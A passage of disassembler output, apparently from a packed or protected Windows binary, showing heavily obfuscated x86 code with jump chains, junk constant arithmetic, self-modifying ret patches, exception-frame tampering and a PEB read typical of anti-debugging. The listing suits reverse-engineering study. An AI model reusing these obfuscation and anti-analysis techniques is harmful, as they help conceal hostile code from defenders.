; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4508DB
loc_43E7D0: ; CODE XREF: sub_4508DB-A1Cj
jnz loc_45637C
loc_43E7D6: ; CODE XREF: ut7h7i2x:0044EAD7j
jmp loc_43F516
; END OF FUNCTION CHUNK FOR sub_4508DB
; ---------------------------------------------------------------------------
or edx, 0BDE1E7C0h
jmp loc_456371
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_276. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_43E7E7: ; CODE XREF: ut7h7i2x:004529A2j
jmp loc_43E758
; =============== S U B R O U T I N E =======================================
sub_43E7EC proc near ; CODE XREF: ut7h7i2x:004509AEj
; ut7h7i2x:0045759Fp
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 0044A67B SIZE 0000000D BYTES
xchg ecx, [esp+0]
pop ecx
add eax, 41F33675h
call sub_43AA94
mov ds:off_41D0B8, eax
lea eax, loc_44A67B
mov byte ptr [eax], 0C3h
jmp loc_44A67B
sub_43E7EC endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44339F
loc_43E80F: ; CODE XREF: sub_44339F+5j
mov eax, [esp+0]
jmp loc_44EE6D
; END OF FUNCTION CHUNK FOR sub_44339F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44FC60
loc_43E817: ; CODE XREF: sub_44FC60:loc_4470D1j
push 0B5A4CEC7h
pop eax
sub eax, 2B3A43D4h
test eax, 400000h
jmp loc_453DD5
; END OF FUNCTION CHUNK FOR sub_44FC60
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439BD1
loc_43E82E: ; CODE XREF: sub_439BD1+1j
mov ebp, esp
push ecx
mov esp, ebp
pop ebp
jmp loc_43FABA
; END OF FUNCTION CHUNK FOR sub_439BD1
; ---------------------------------------------------------------------------
ja loc_43D9D7
and edi, ebp
jmp loc_448A02
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_537. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4565B2
loc_43E847: ; CODE XREF: sub_4565B2-292Aj
jmp loc_456000
; END OF FUNCTION CHUNK FOR sub_4565B2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44D79C
loc_43E84C: ; CODE XREF: sub_44D79C+Bj
jmp loc_446CF1
; END OF FUNCTION CHUNK FOR sub_44D79C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439BF8
loc_43E851: ; CODE XREF: sub_439BF8+C5CAj
mov ebx, edx
loc_43E853: ; CODE XREF: ut7h7i2x:loc_43B508j
mov eax, [esp+8+var_8]
push offset aQh1cd ; "Qh1cD"
jmp loc_455C74
; END OF FUNCTION CHUNK FOR sub_439BF8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_450645
loc_43E860: ; CODE XREF: sub_450645:loc_43B7A1j
; ut7h7i2x:00441C8Aj
xchg ecx, [edi]
or ebp, edx
loc_43E864: ; CODE XREF: ut7h7i2x:00444550j
; ut7h7i2x:loc_4492DFj
call nullsub_4
retn
; END OF FUNCTION CHUNK FOR sub_450645
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_4. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_43E86B: ; CODE XREF: ut7h7i2x:004398EEj
jmp loc_453869
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44C791
loc_43E870: ; CODE XREF: sub_44C791+1F6Dj
; ut7h7i2x:0044FE1Ej
call sub_44E2C4
test al, al
jz loc_43E7C6
jmp loc_45351D
; END OF FUNCTION CHUNK FOR sub_44C791
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44EC11
loc_43E882: ; CODE XREF: sub_44EC11:loc_4515F7j
xchg edi, [esp+8+var_8]
mov eax, edi
pop edi
rol eax, 0Bh
xor eax, 24E44DFh
jmp loc_443C15
; END OF FUNCTION CHUNK FOR sub_44EC11
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_452B14
loc_43E896: ; CODE XREF: sub_452B14+78E0j
jle loc_44DB9F
loc_43E89C: ; CODE XREF: sub_452B14-25F9j
and ebx, 0AC1C6B88h
rol ebx, 10h
xor ebx, 6180280Ch
popf
xchg ebx, [esp-4+arg_0]
push esi
jmp loc_448EDC
; END OF FUNCTION CHUNK FOR sub_452B14
; ---------------------------------------------------------------------------
loc_43E8B5: ; CODE XREF: ut7h7i2x:loc_44585Ej
push offset sub_43BB92
jmp locret_4452EF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_452D3D
loc_43E8BF: ; CODE XREF: sub_452D3D:loc_44ACA9j
xor edx, 30B2EF4Eh
add edx, 61B8BEFBh
and edx, 0B84983E3h
add edx, 640423B5h
jmp loc_440D06
; END OF FUNCTION CHUNK FOR sub_452D3D
; ---------------------------------------------------------------------------
loc_43E8DC: ; CODE XREF: ut7h7i2x:0044C15Aj
jz loc_44E5E8
adc ebp, eax
adc ecx, eax
jmp loc_44E5E8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43FD68
loc_43E8EB: ; CODE XREF: sub_43FD68+6DBEj
jnz loc_44989E
; END OF FUNCTION CHUNK FOR sub_43FD68
; START OF FUNCTION CHUNK FOR sub_4448AF
loc_43E8F1: ; CODE XREF: sub_4448AF+F2D3j
jmp nullsub_174
; END OF FUNCTION CHUNK FOR sub_4448AF
; ---------------------------------------------------------------------------
jb loc_44388C
jmp loc_449895
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_254. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45854D
loc_43E902: ; CODE XREF: sub_45854D-BA61j
lea eax, loc_43EC52
mov byte ptr [eax], 0C3h
jmp loc_43D42C
; END OF FUNCTION CHUNK FOR sub_45854D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4463D6
loc_43E910: ; CODE XREF: sub_4463D6:loc_43EC52j
push offset loc_44D9D0
jmp nullsub_59
; END OF FUNCTION CHUNK FOR sub_4463D6
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44C20D
loc_43E91A: ; CODE XREF: sub_44C20D+B5Aj
xor eax, 0C33898D3h
mov eax, esi
loc_43E922: ; CODE XREF: sub_44C20D:loc_448417j
push eax
push 0A7E3612Ah
pop eax
and eax, 78917E9Ch
xor eax, 20816008h
jmp loc_442E45
; END OF FUNCTION CHUNK FOR sub_44C20D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43AB62
loc_43E93A: ; CODE XREF: sub_43AB62+747Aj
push offset sub_452AAF
jmp loc_4476A0
; END OF FUNCTION CHUNK FOR sub_43AB62
; =============== S U B R O U T I N E =======================================
sub_43E944 proc near ; DATA XREF: ut7h7i2x:0043B043o
; FUNCTION CHUNK AT 0044FF16 SIZE 00000005 BYTES
mov [ebp-0Bh], al
xor eax, eax
push offset loc_454CC4
jmp loc_44FF16
sub_43E944 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4445DC
loc_43E953: ; CODE XREF: sub_4445DC:loc_458F22j
push edx
push ecx
pop edx
xchg edx, [esp+0]
mov [ebp+var_4], eax
jmp loc_448428
; END OF FUNCTION CHUNK FOR sub_4445DC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44917B
loc_43E961: ; CODE XREF: sub_44917B:loc_452C7Dj
mov eax, [eax]
cmp byte ptr [eax], 0F1h
jnz loc_448B19
jmp loc_43D6AE
; END OF FUNCTION CHUNK FOR sub_44917B
; ---------------------------------------------------------------------------
loc_43E971: ; CODE XREF: ut7h7i2x:loc_445509j
rol edi, 14h
or edi, 4CB1D7C5h
rol edi, 1
add edi, 60D8085Bh
xchg edi, [esp]
jmp loc_454191
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_169. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4431BB
loc_43E98B: ; CODE XREF: sub_4431BB:loc_451D8Ej
push offset loc_43F0E6
jmp nullsub_493
; END OF FUNCTION CHUNK FOR sub_4431BB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_444273
loc_43E995: ; CODE XREF: sub_444273:loc_43B3B5j
jz loc_44BE57
jmp loc_4465DE
; END OF FUNCTION CHUNK FOR sub_444273
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_444EAA
loc_43E9A0: ; CODE XREF: sub_444EAA:loc_4399EAj
xchg ecx, [esp+0]
mov edx, ecx
pop ecx
mov eax, [esp-4+arg_0]
push edx
call sub_449D3B
jmp loc_442EE6
; END OF FUNCTION CHUNK FOR sub_444EAA
; ---------------------------------------------------------------------------
mov edx, 0BB931B55h
call sub_44ED9F
push offset loc_4556A6
jmp locret_449FC3
; ---------------------------------------------------------------------------
loc_43E9C8: ; CODE XREF: ut7h7i2x:0043D227j
ror edi, 14h
; =============== S U B R O U T I N E =======================================
sub_43E9CB proc near ; CODE XREF: sub_44C273+1p
; FUNCTION CHUNK AT 0043DE3F SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0044A549 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 004526E8 SIZE 00000005 BYTES
xchg eax, [esp+0]
pop eax
mov ebp, esp
push edx
mov edx, ecx
xchg edx, [esp+0]
jmp loc_43DE3F
sub_43E9CB endp ; sp-analysis failed
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_51. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4589C7
loc_43E9DD: ; CODE XREF: sub_4589C7+14j
jz loc_445FBF
loc_43E9E3: ; CODE XREF: sub_454361+Bj
jmp nullsub_534
; END OF FUNCTION CHUNK FOR sub_4589C7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_447F0A
loc_43E9E8: ; CODE XREF: sub_447F0A+9375j
jmp loc_454293
; END OF FUNCTION CHUNK FOR sub_447F0A
; ---------------------------------------------------------------------------
xor eax, ebp
add edx, esi
not eax
jmp loc_45A530
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_308. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_448CBC
loc_43E9F9: ; CODE XREF: sub_448CBC+A501j
jmp loc_43C9A5
; END OF FUNCTION CHUNK FOR sub_448CBC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_455775
loc_43E9FE: ; CODE XREF: sub_455775:loc_44BC94j
jz loc_43A942
jmp loc_445B6F
; END OF FUNCTION CHUNK FOR sub_455775
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_455383
loc_43EA09: ; CODE XREF: sub_455383:loc_43F796j
jz loc_45A7FB
xor esi, 0DF3C091Eh
and esi, 10CD8538h
sub ebp, 0FAA7C52Ah
cmp ebp, ebx
jmp loc_4465B5
; END OF FUNCTION CHUNK FOR sub_455383
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43D021
loc_43EA28: ; CODE XREF: sub_43D021+28A7j
ja loc_444F86
jnp loc_43ED1F
loc_43EA34: ; CODE XREF: sub_43D021:loc_43FF20j
push edx
push 0CD7B2889h
jmp loc_449F1D
; END OF FUNCTION CHUNK FOR sub_43D021
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44445F
loc_43EA3F: ; CODE XREF: sub_44445F:loc_455F65j
push edi
mov edi, edx
xchg edi, [esp+8+var_8]
call sub_456520
jmp loc_451DCE
; END OF FUNCTION CHUNK FOR sub_44445F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_446F56
loc_43EA4F: ; CODE XREF: sub_446F56+4F59j
xchg edx, [esp+4+var_4]
jmp loc_4487F4
; END OF FUNCTION CHUNK FOR sub_446F56
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4433C5
loc_43EA57: ; CODE XREF: sub_4433C5:loc_44AD0Dj
jnz loc_440F39
sub al, 99h
mov edx, [ebp-4]
imul byte ptr [edx]
loc_43EA64: ; CODE XREF: sub_444EAA+8104j
cmp al, 0A4h
jz loc_4445CF
jmp loc_43BB0B
; END OF FUNCTION CHUNK FOR sub_4433C5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44BF76
loc_43EA71: ; CODE XREF: sub_44BF76+Fj
jz loc_44A4F0
jmp loc_43BBA3
; END OF FUNCTION CHUNK FOR sub_44BF76
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439AE7
loc_43EA7C: ; CODE XREF: sub_439AE7+EB71j
mov ebp, esp
push ecx
mov esp, ebp
xchg ecx, [esp+4+var_4]
jmp loc_43DDD9
; END OF FUNCTION CHUNK FOR sub_439AE7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44D998
loc_43EA89: ; CODE XREF: sub_44D998+3j
push ecx
mov esp, ebp
pop ebp
push offset loc_43DBC4
jmp loc_453FF6
; END OF FUNCTION CHUNK FOR sub_44D998
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44A3BB
loc_43EA97: ; CODE XREF: sub_44A3BB:loc_441BFFj
call sub_4446B0
; END OF FUNCTION CHUNK FOR sub_44A3BB
; START OF FUNCTION CHUNK FOR sub_44865D
loc_43EA9C: ; CODE XREF: sub_44865D-B2AFj
jmp loc_452A64
; END OF FUNCTION CHUNK FOR sub_44865D
; ---------------------------------------------------------------------------
loc_43EAA1: ; CODE XREF: ut7h7i2x:00444412j
mov eax, [ebp-10h]
push eax
call sub_44DB3E
test eax, eax
jmp loc_447FC6
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44E5DC
loc_43EAB1: ; CODE XREF: sub_44E5DC-9E86j
adc edx, 43D50391h
loc_43EAB7: ; CODE XREF: sub_44E5DC:loc_4489D3j
push 0CA2517A6h
pop eax
xor eax, 1653490Dh
add eax, 0CACBC09h
jmp loc_454C3B
; END OF FUNCTION CHUNK FOR sub_44E5DC
; ---------------------------------------------------------------------------
loc_43EACE: ; DATA XREF: sub_453C2C-3124o
cmp ds:dword_43A7C0, 0
jnz loc_456F7D
call nullsub_19
call sub_453D8B
mov edx, 0CF0182F6h
call sub_44B8F8
jmp loc_456F78
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_453E14
loc_43EAF4: ; CODE XREF: sub_453E14:loc_4406ECj
add edx, 0A442C984h
xchg ebp, eax
jmp loc_456D48
; END OF FUNCTION CHUNK FOR sub_453E14
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_454B2B
loc_43EB01: ; CODE XREF: sub_454B2B:loc_44A9A7j
xchg eax, [esp+4+var_4]
push esi
push 57A8F0E2h
pop esi
or esi, 0B1707DF0h
and esi, 7A9EF2AFh
jmp loc_455D85
; END OF FUNCTION CHUNK FOR sub_454B2B
; ---------------------------------------------------------------------------
loc_43EB1C: ; CODE XREF: ut7h7i2x:0044EAE1j
sub al, 99h
mov edx, [ebp-4]
imul byte ptr [edx]
cmp al, 0A4h
jz loc_453CF5
jmp loc_4556C9
; ---------------------------------------------------------------------------
loc_43EB30: ; CODE XREF: ut7h7i2x:00449FCFj
jp loc_43A0EC
loc_43EB36: ; CODE XREF: ut7h7i2x:loc_439F00j
pop large dword ptr fs:0
add esp, 4
mov eax, 50h
call sub_4448AF
jmp loc_4560B6
; ---------------------------------------------------------------------------
jmp loc_458413
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_446599
loc_43EB54: ; CODE XREF: sub_446599:loc_44895Fj
mov eax, large fs:30h
jmp loc_458C6B
; END OF FUNCTION CHUNK FOR sub_446599
; ---------------------------------------------------------------------------
xor edi, 0A59420AEh
jmp sub_458D6E
; ---------------------------------------------------------------------------
loc_43EB6B: ; CODE XREF: ut7h7i2x:loc_4496B7j
push 0A6117039h
pop eax
rol eax, 2
xor eax, 0B07592Bh
jmp loc_446B47
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44DB48
loc_43EB7F: ; CODE XREF: sub_44DB48:loc_4537B7j
mov eax, [esp+0]
push eax
mov eax, ecx
jmp loc_4449D0
; END OF FUNCTION CHUNK FOR sub_44DB48
; =============== S U B R O U T I N E =======================================
sub_43EB8A proc near ; DATA XREF: sub_446320+2DB6o
; FUNCTION CHUNK AT 00442F00 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004465F2 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0044F8C2 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00451B43 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045745F SIZE 0000001C BYTES
; FUNCTION CHUNK AT 004593B8 SIZE 0000001B BYTES
xchg edi, [esp+0]
push 9F8E7333h
pop esi
add esi, 52F13EF5h
jmp loc_44F8C2
sub_43EB8A endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_43EB9E: ; CODE XREF: ut7h7i2x:loc_456EFDj
and ecx, 0D5EDF5E1h
add ecx, 6FC0D298h
xchg ecx, [esp]
jmp nullsub_16
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43AB62
loc_43EBB2: ; CODE XREF: sub_43AB62+9558j
ror ebp, 1Ch
push 219A0E34h
loc_43EBBA: ; CODE XREF: ut7h7i2x:00445497j
; sub_456B19-9849j ...
jmp loc_449126
; END OF FUNCTION CHUNK FOR sub_43AB62
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_459111
loc_43EBBF: ; CODE XREF: sub_459111-17916j
; ut7h7i2x:loc_44495Cj
pop ecx
push offset loc_4508D4
jmp nullsub_373
; END OF FUNCTION CHUNK FOR sub_459111
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44917B
loc_43EBCA: ; CODE XREF: sub_44917B+Dj
jnb loc_44062B
jmp loc_454985
; END OF FUNCTION CHUNK FOR sub_44917B
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_31. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45A32D
loc_43EBD6: ; CODE XREF: sub_45A32D+12j
xor esi, 0FA8283F8h
rol esi, 0Fh
loc_43EBDF: ; CODE XREF: ut7h7i2x:loc_43B22Ej
cmp esi, 6C7D452Bh
jmp loc_45934C
; END OF FUNCTION CHUNK FOR sub_45A32D
; ---------------------------------------------------------------------------
loc_43EBEA: ; CODE XREF: ut7h7i2x:0044A1AAj
mov eax, [ebp+0]
jmp loc_449E3B
; ---------------------------------------------------------------------------
js loc_45052E
jmp sub_43F0B0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44602A
loc_43EBFD: ; CODE XREF: sub_44602A-2C38j
pop ebx
; END OF FUNCTION CHUNK FOR sub_44602A
; START OF FUNCTION CHUNK FOR sub_449DC4
loc_43EBFE: ; CODE XREF: sub_449DC4-10B82j
; sub_44602A:loc_444393j ...
call sub_452EED
loc_43EC03: ; CODE XREF: sub_451F89+Ej
jmp nullsub_70
; END OF FUNCTION CHUNK FOR sub_449DC4
; ---------------------------------------------------------------------------
loc_43EC08: ; CODE XREF: ut7h7i2x:004528E0j
not ebx
jmp loc_44FA3E
; ---------------------------------------------------------------------------
xor eax, ebx
jmp sub_44F7A9
; ---------------------------------------------------------------------------
loc_43EC16: ; CODE XREF: ut7h7i2x:loc_44365Cj
jz loc_43D86D
jmp loc_43BDB8
; ---------------------------------------------------------------------------
loc_43EC21: ; CODE XREF: ut7h7i2x:0043CF7Ej
add edi, 0AA18B1B8h
mov [edi], edx
push offset sub_441924
jmp loc_44152B
; ---------------------------------------------------------------------------
loc_43EC33: ; DATA XREF: sub_459B58-1E07Bo
push 9D40344Ah
pop ecx
rol ecx, 18h
test ecx, 1
jmp loc_44C029
; ---------------------------------------------------------------------------
jmp ds:off_41D028
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44271B
loc_43EC4D: ; CODE XREF: sub_44271B+Fj
jmp nullsub_44
; END OF FUNCTION CHUNK FOR sub_44271B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4463D6
loc_43EC52: ; CODE XREF: sub_4463D6-C0F3j
; sub_45854D:loc_43D42Cj ...
jno loc_43E910
xchg ebp, [esp+4+var_4]
mov edx, ebp
jmp loc_44183A
; END OF FUNCTION CHUNK FOR sub_4463D6
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44D1F0
loc_43EC62: ; CODE XREF: sub_44D1F0-8DAAj
and edx, 0C2B5717Dh
or edx, 0F75B39B3h
jnz loc_444830
loc_43EC74: ; CODE XREF: sub_44A0CE+FA3Aj
jmp loc_45A5B5
; END OF FUNCTION CHUNK FOR sub_44D1F0
; ---------------------------------------------------------------------------
loc_43EC79: ; CODE XREF: ut7h7i2x:0044E077j
jmp loc_43DEA0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44BF76
loc_43EC7E: ; CODE XREF: sub_44BF76-1A75j
jmp loc_45935D
; END OF FUNCTION CHUNK FOR sub_44BF76
; ---------------------------------------------------------------------------
add ebx, 79BCC56Fh
jmp loc_453FE0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_444273
loc_43EC8E: ; CODE XREF: sub_444273:loc_43D6B3j
jz loc_441BBE
loc_43EC94: ; CODE XREF: ut7h7i2x:00454654j
jmp nullsub_443
; END OF FUNCTION CHUNK FOR sub_444273
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43CE34
loc_43EC99: ; CODE XREF: sub_43CE34+61EFj
jmp loc_4446AA
; END OF FUNCTION CHUNK FOR sub_43CE34
; ---------------------------------------------------------------------------
sbb ebp, 3E8CD3F0h
popf
jmp loc_441BBE
; ---------------------------------------------------------------------------
shl ebx, 18h
jmp loc_4398B9
; ---------------------------------------------------------------------------
loc_43ECB2: ; CODE XREF: ut7h7i2x:0045A466j
sub eax, 0A28622A6h
add eax, 79AB7C9Eh
or eax, 0FD5838DCh
xor eax, 0FDF9FBDFh
xchg eax, [esp]
push 0
push 10h
push 0A7493139h
jmp loc_457F47
; ---------------------------------------------------------------------------
pop esi
jmp sub_44D1F0
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_463. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_43ECE2: ; CODE XREF: ut7h7i2x:00459DDCj
push 0EA24C4B1h
jmp loc_453F38
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_450E41
loc_43ECEC: ; CODE XREF: sub_450E41:loc_443483j
jz loc_44EB69
xor ecx, edx
test eax, 8222DF5Fh
jmp loc_452E1A
; END OF FUNCTION CHUNK FOR sub_450E41
; =============== S U B R O U T I N E =======================================
sub_43ECFF proc near ; CODE XREF: ut7h7i2x:0043D293j
; sub_4450AC:loc_44CB02p
; FUNCTION CHUNK AT 0043F7A0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044252C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004448EB SIZE 00000009 BYTES
; FUNCTION CHUNK AT 00455D46 SIZE 0000001C BYTES
xchg edx, [esp+0]
pop edx
push 0B1AFE12Bh
pop ecx
jmp loc_44252C
sub_43ECFF endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_455060
loc_43ED0E: ; CODE XREF: sub_455060-4DD7j
push edi
jmp loc_44B077
; END OF FUNCTION CHUNK FOR sub_455060
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45854D
loc_43ED14: ; CODE XREF: sub_45854D+1D99j
jz loc_44FD25
jmp loc_439CDC
; END OF FUNCTION CHUNK FOR sub_45854D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43D021
loc_43ED1F: ; CODE XREF: sub_43D021+1A0Dj
jns loc_447993
jmp sub_458F07
; END OF FUNCTION CHUNK FOR sub_43D021
; ---------------------------------------------------------------------------
loc_43ED2A: ; CODE XREF: ut7h7i2x:0044B639j
sub ecx, 0CC1577DAh
xor ecx, 87009B2Dh
xor edx, edx
div ecx
push edi
push 18764CAh
jmp loc_456339
; ---------------------------------------------------------------------------
loc_43ED45: ; DATA XREF: sub_441501+1214Fo
mov ds:off_41D154, eax
lea eax, loc_43EE00
mov byte ptr [eax], 0C3h
jmp loc_43B35A
; =============== S U B R O U T I N E =======================================
sub_43ED59 proc near ; CODE XREF: sub_405F00+247p
; sub_405F00+2A2p ...
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0044EF4D SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00459229 SIZE 00000021 BYTES
push ecx
push 293121F4h
jmp loc_459229
sub_43ED59 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4518D7
loc_43ED64: ; CODE XREF: ut7h7i2x:00447FE0j
; sub_4518D7:loc_44A069j
xor ebx, 4D3C5D2Fh
jnz loc_455512
loc_43ED70: ; CODE XREF: ut7h7i2x:0043FD48j
jmp loc_43F0CB
; END OF FUNCTION CHUNK FOR sub_4518D7
; ---------------------------------------------------------------------------
or esi, ecx
xor ebp, 149F7E2h
jg loc_45A9CC
jmp loc_44B28A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_452B14
loc_43ED88: ; CODE XREF: sub_452B14-F326j
; sub_452B14:loc_455213j
mov eax, 0DD70DD34h
call sub_43AED9
push edx
push 914D8ADh
pop edx
or edx, 8FA3CCFEh
jmp loc_43A3EE
; END OF FUNCTION CHUNK FOR sub_452B14
; =============== S U B R O U T I N E =======================================
sub_43EDA4 proc near ; DATA XREF: sub_4580CF-16237o
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0043BBA8 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0044286D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00454FB8 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0045A3B2 SIZE 0000001D BYTES
push edi
push ecx
pop edi
xchg edi, [esp+4+var_4]
mov esp, ebp
xchg eax, [esp+4+var_4]
jmp loc_43BBA8
sub_43EDA4 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44EC11
loc_43EDB4: ; CODE XREF: sub_44EC11:loc_4585C6j
jz loc_45360A
loc_43EDBA: ; CODE XREF: ut7h7i2x:loc_44DC07j
jmp loc_43AC29
; END OF FUNCTION CHUNK FOR sub_44EC11
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_444A12
loc_43EDBF: ; CODE XREF: sub_444A12+2EF7j
mov eax, ebx
loc_43EDC1: ; CODE XREF: sub_444A12:loc_43B115j
push 0BFF1E8D8h
pop eax
or eax, 3A560FFEh
xor eax, 0B93ED5D7h
jmp loc_44154F
; END OF FUNCTION CHUNK FOR sub_444A12
; =============== S U B R O U T I N E =======================================
sub_43EDD8 proc near ; DATA XREF: sub_44A3BB+1713o
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0043B9AC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043D02E SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0043FB03 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00447B17 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044981F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045665B SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00457D0A SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00458750 SIZE 00000005 BYTES
mov eax, [eax]
test dword ptr [eax], 0FFFF0000h
jnz loc_4440F7
jmp loc_447B17
sub_43EDD8 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
jmp ds:off_41D154
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_440493
loc_43EDF1: ; CODE XREF: sub_440493+1A930j
jmp loc_448A9C
; END OF FUNCTION CHUNK FOR sub_440493
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_445AD1
loc_43EDF6: ; CODE XREF: sub_445AD1+DAEEj
jmp sub_454196
; END OF FUNCTION CHUNK FOR sub_445AD1
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43AA94
loc_43EDFB: ; CODE XREF: sub_43AA94+ADFj
jmp loc_44AD1A
; END OF FUNCTION CHUNK FOR sub_43AA94
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44D683
loc_43EE00: ; CODE XREF: sub_43B34F:loc_43B35Aj
; sub_44D683+215j ...
pop edx
jo loc_45AC4C
mov eax, [esp-4+arg_0]
push edx
jmp loc_44A401
; END OF FUNCTION CHUNK FOR sub_44D683
; ---------------------------------------------------------------------------
cmp ebp, esi
jmp loc_457830
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_446320
loc_43EE17: ; CODE XREF: sub_446320:loc_43C268j
xchg edi, [esp+0]
retn
; END OF FUNCTION CHUNK FOR sub_446320
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43FF65
loc_43EE1B: ; CODE XREF: sub_43FF65+13A77j
jmp loc_4400A5
; END OF FUNCTION CHUNK FOR sub_43FF65
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_447CBE
loc_43EE20: ; CODE XREF: sub_447CBE+5800j
jmp loc_44086F
